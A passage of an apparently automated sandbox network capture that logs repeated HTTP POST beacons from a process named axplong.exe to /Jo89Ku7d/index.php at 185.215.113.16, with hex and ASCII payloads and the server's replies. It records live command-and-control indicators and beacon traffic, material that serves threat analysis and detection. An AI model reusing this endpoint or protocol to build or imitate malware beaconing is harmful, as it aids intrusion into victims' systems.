                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    50192.168.2.849762185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:43:59.365015984 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:44:00.055454016 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:59 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:44:00.056695938 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:44:00.281776905 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:44:00 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    51192.168.2.849763185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:44:00.396591902 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:44:01.106066942 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:44:01 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:44:01.106846094 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:44:01.336932898 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:44:01 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    52192.168.2.849764185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:44:01.678165913 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:44:02.220508099 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:44:02 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:44:02.221329927 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:44:02.446058035 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:44:02 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    53192.168.2.849765185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:44:02.566796064 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:44:03.281410933 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:44:03 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:44:03.286047935 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:44:03.529601097 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:44:03 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    54192.168.2.849766185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:44:03.648351908 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:44:04.366070032 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:44:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:44:04.376144886 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:44:04.608016968 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:44:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    55192.168.2.849767185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:44:04.785007954 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:44:05.474082947 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:44:05 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    56192.168.2.849768185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:44:05.483377934 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:44:06.196568012 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:44:06 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    57192.168.2.849769185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:44:06.318288088 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:44:07.031286001 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:44:06 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    58192.168.2.849770185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:44:07.039694071 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:44:07.761219025 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:44:07 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    59192.168.2.849771185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:44:07.887510061 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:44:08.593796015 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:44:08 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:44:08.601042032 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:44:08.835089922 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:44:08 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    60192.168.2.849773185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:44:09.124342918 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:44:09.849025011 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:44:09 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    61192.168.2.849774185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:44:09.966330051 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:44:10.665312052 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:44:10 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    62192.168.2.849775185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:44:10.673729897 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:44:11.388468981 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:44:11 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    63192.168.2.849776185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:44:11.571511030 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:44:12.273880959 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:44:12 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:44:12.279227018 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:44:12.503853083 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:44:12 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    64192.168.2.849777185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:44:12.615863085 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:44:13.347182989 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:44:13 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    65192.168.2.849778185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:44:13.356055021 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:44:14.054225922 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:44:13 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
